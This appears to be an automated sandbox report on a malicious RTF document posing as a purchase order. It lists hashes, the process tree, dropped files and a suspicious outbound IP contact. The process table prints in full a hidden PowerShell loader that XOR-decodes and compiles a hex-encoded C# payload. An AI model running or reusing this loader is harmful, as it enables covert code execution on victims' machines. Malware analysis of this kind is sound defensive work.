File name: | New Order PI-19-09878.doc |
Full analysis: | https://app.any.run/tasks/67c3213f-0814-4ad1-a7de-63829b7c09ce |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 09:27:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | C0C0FFEE3B19D5D587F6F0A60D6D8CA5 |
SHA1: | 89D7634DB765688A854039F28C6B978AC5218A0B |
SHA256: | 5D0293091090A578B74FD6ED813F4F0B9B8E895B5AF355B05ADD9A9722468EBA |
SSDEEP: | 1536:oZdMoLtGeCOZQmd1EJsgiAnEppBS1DMO8td7XS9qHlbKWiKoLtGeCOZQmd1EJsgb:oHMZ9qlrjZ9qlrjZ9qlrEtxS |
.rtf | Rich Text Format (100) |
InternalVersionNumber: | 57435 |
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3572 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\New Order PI-19-09878.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
1756 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 0; Version: 14.0.6024.1000 |
1212 | powershell -WindowStyle Hidden function u5cb7df { param($rdb369) $oe2cc8a = 'tdf42';$geaeed = ''; for ($i = 0; $i -lt $rdb369.length; $i+=2) { $g7722 = [convert]::ToByte($rdb369.Substring($i, 2), 16); $geaeed += [char]($g7722 -bxor $oe2cc8a[($i / 2) % $oe2cc8a.length]); } return $geaeed; } $w6d32 = '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'; $w6d322 = u5cb7df($w6d32); Add-Type -TypeDefinition $w6d322; [bc5c942]::f9b1554(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3276 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 0; Version: 14.0.6024.1000 |
3944 | powershell -WindowStyle Hidden function u5cb7df { param($rdb369) $oe2cc8a = 'tdf42';$geaeed = ''; for ($i = 0; $i -lt $rdb369.length; $i+=2) { $g7722 = [convert]::ToByte($rdb369.Substring($i, 2), 16); $geaeed += [char]($g7722 -bxor $oe2cc8a[($i / 2) % $oe2cc8a.length]); } return $geaeed; } $w6d32 = '01170f5a5554371f474611095d41411d0a0114610d1712515f5a36135a461d09031a7b1a1003465d04370346441d0703470901170f5a5554371f4746110948705b1503085b41000d05470901170f5a5554371f47461109487d7d4f11155d5c1344354d4100010b1a7c11105d3938041104585b1744055853071746565141075f00000f3f22585e3d09165b40004c445f57060a03580146464a715c00161f645d1d0a12091033011264401b0727505606011547105d3946444716080f5712071007405b1744034c46111608147b1a10364040541e005554435c521c7b1a10364040540a500c0047481540401d0a01144a4001540d045d5f3d705e182d0b445d06104e1659111608515e4756441812310a12464b240b0f5a46545946167e1b0502785b161607464b564d3b144201060a5d5154171255461d0746514a0001145a123d0a1264460644030300105751551a0710145d5c134417075042004f0f6930080a7d5f040b14401a560f03465c11085506105844235a46061d365b5b1a105b16641d161241531834145b46110712161b2944164150180d0514410005125d5154011e4057060a46565d1b0846440b1552030c075c2d084062001646475043055e18673d0a1264460644115256115c4a14471d0a12144412575506531748465b470044135d5c004414500a4c065e501b4f3f22585e3d09165b40004c447f57060a035801464a02585e564846715c00161f645d1d0a12091026100a795d02012b515f1b161f161e543703407e1517127140060b140954150815511b2944154053000d0514570c1003465c5412095d565415020054104c2f5a46241014144a435c55075645482f5a462410141459425d555201580d0840121f025055035d5f164150180d0514410005125d51540d084012125d04050741504e1d493d0a126446064410550543055405124944030300105751551a015105560510024e160341545f0507410057570344545e0453564d4f0f5b124c105505430554050f492d0840620016486e57060b4f4f551b100914514d5d070609092d08406200164659061557530948120500030a404c105505430554051e015105560510024e160141545f05074100500503435453040a435252030346545404014052441d1b4f0d001c5f400555010f492d0840620016486e5706
0b4f4f551b100914514d5d07060909312f5a46241014145e1506520005494c337d5c003412461b415f135d5c0044170c0b4d515b04091d024e15424d0550510a414c0b005347514a5853165052031e441c52041e1b111214434c5d5f011b5d1f015b461b44050d0b15565d49700d10036f6f540251070112591d044a47554a044a12024a044a4d541b0f7b1a10364040540357525410515b795306170e555e5a250a585d172c21585d16050a1c015d5f2b5540070c07581c370b164d1a125355075458544a5303120202011e474d5d45564002021c5c1113467d5c003412461a19500707075a30097d5c0052521c1b5f541e040245064f1855450200500758574f0f514d5d0706085433035671180d035a46540f050604155c5b5a57034431515037080f515c004c4f0f4100160f5a55541c575205435d5f09771a120f465d1a09035a465a230340741b080251402405125c1a310a105d401b0a0b515c004a354457170d0758741b080251405a2516445e1d0707405b1b0a225546154d4d166e2803500d0b4355441f474107040356124c440153445557510745464f0f59175650550a5a2009435c180b0750741d08031c474107040356124c440551455457060640545e015040065301024555050004415253070315545600064150520c02415456000740065406054455020003415653020241540400014157441d1e0c550003054d5d4f0f62060b0551410737125540002d08525d5403025156155d5b5a57034436465d1701154761000514407b1a02091c4a450251030b4d4d5d64401b070347415a37125540004c01505710055f1d0906011241401a44560f4f041104585b1744154053000d05144100160f5a5554115357504300001c4100160f5a55541c050253404d1d4746060d0853121a525e060149461250544056440f4100160f5a555401510656475307096100160f5a555a210b44460d5f005b405c0d0840121d59560f5b481c050253404a2a515c13100e0f5b5f59541d49161d1251120e020752054c505b775d1a120346465a3009764b00014e4c514205521a6101061540401d0a011c5b58564f1803424d5d510546005503535f594e575a15164f1c48120500030a404438145c425c5407695c0d49061b5441465a044c56551a7e110a01405a294d5d4940111013465c54015106564753070f4f09'; $w6d322 = u5cb7df($w6d32); Add-Type -TypeDefinition $w6d322; [bc5c942]::f9b1554(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2772 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\wcu17jnx.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Visual C# Command Line Compiler; Exit code: 0; Version: 8.0.50727.4927 (NetFXspW7.050727-4900) |
576 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Exit code: 0; Version: 14.0.6024.1000 |
2056 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE3C9.tmp" "c:\Users\admin\AppData\Local\Temp\CSCE3B9.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft® Resource File To COFF Object Conversion Utility; Exit code: 0; Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
3260 | powershell -WindowStyle Hidden function u5cb7df { param($rdb369) $oe2cc8a = 'tdf42';$geaeed = ''; for ($i = 0; $i -lt $rdb369.length; $i+=2) { $g7722 = [convert]::ToByte($rdb369.Substring($i, 2), 16); $geaeed += [char]($g7722 -bxor $oe2cc8a[($i / 2) % $oe2cc8a.length]); } return $geaeed; } $w6d32 = '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'; $w6d322 = u5cb7df($w6d32); Add-Type -TypeDefinition $w6d322; [bc5c942]::f9b1554(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1500 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ph_0qbjg.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Visual C# Command Line Compiler; Exit code: 0; Version: 8.0.50727.4927 (NetFXspW7.050727-4900) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD13A.tmp.cvr | — | — | — |
1756 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRD91A.tmp.cvr | — | — | — |
3276 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRDF25.tmp.cvr | — | — | — |
1212 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0DAJ02M47HQLW6CIQYFB.temp | — | — | — |
576 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE2AF.tmp.cvr | — | — | — |
2772 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCE3B9.tmp | — | — | — |
2772 | csc.exe | C:\Users\admin\AppData\Local\Temp\wcu17jnx.pdb | — | — | — |
3944 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U38F8NRAJUFT7O6I1ZUL.temp | — | — | — |
2056 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESE3C9.tmp | — | — | — |
2772 | csc.exe | C:\Users\admin\AppData\Local\Temp\wcu17jnx.dll | — | — | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1212 | powershell.exe | 35.225.200.121:80 | — | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
dns.msftncsi.com | — | shared |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |